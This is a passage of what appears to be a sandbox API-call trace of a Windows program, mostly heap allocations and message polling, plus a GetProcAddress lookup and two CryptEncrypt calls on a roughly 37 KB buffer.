lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0257.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0257.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0257.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0257.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0257.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0257.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0257.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0257.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0257.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0257.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0257.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0257.376] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0257.376] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b90 [0257.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0257.376] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0257.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b90 | out: hHeap=0x970000) returned 1 [0257.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0257.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512c8 [0257.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0257.376] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0257.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0257.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0257.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0257.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0257.376] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0257.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0257.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0257.377] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0257.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0257.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0257.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0257.377] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0257.377] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0257.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0257.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0257.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0257.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0257.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0257.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0257.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0257.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0257.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0257.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0257.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0257.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0257.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0257.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0257.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0257.381] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0257.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0257.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0257.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0257.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0257.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0257.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0257.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0257.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0257.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0257.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0257.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0257.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0257.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0257.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0257.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0257.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0257.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0257.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0257.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0257.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0257.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0257.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0257.457] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0257.458] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0257.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0257.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0257.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0257.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0257.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51790 [0257.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51790, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0257.458] CryptEncrypt (in: hKey=0xa87650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x90f2, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x90f8) returned 1 [0257.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0257.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0257.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0257.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0257.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0257.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0257.458] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0257.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0257.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.459] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0257.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0257.460] CharLowerBuffW (in: lpsz="byte[37112]", cchLength=0xb | out: lpsz="byte[37112]") returned 0xb [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0257.460] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0257.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0257.462] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0257.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0257.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0257.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0257.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0257.462] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0257.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0257.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513e8 [0257.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0257.463] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0257.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0257.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0257.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0257.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0257.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0257.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0257.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0257.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.464] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0257.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51760, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0257.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0257.464] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0257.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0257.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0257.465] CryptEncrypt (in: hKey=0xa87650, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2f310*, pdwDataLen=0x8cef60*=0x90f2, dwBufLen=0x90f8 | out: pbData=0x2f2f310*, pdwDataLen=0x8cef60*=0x90f8) returned 1 [0257.466] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.466] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0257.466] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.466] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.467] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.467] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.467] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.468] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0257.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0257.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0257.468] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f10 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0257.468] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0257.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f10 | out: hHeap=0x970000) returned 1 [0257.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0257.468] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0257.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0257.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0257.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0257.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0257.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51520 [0257.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0257.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0257.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0257.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0257.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51580 [0257.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0257.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0257.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0257.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0257.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0257.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0257.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0257.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0257.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0257.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0257.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0257.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 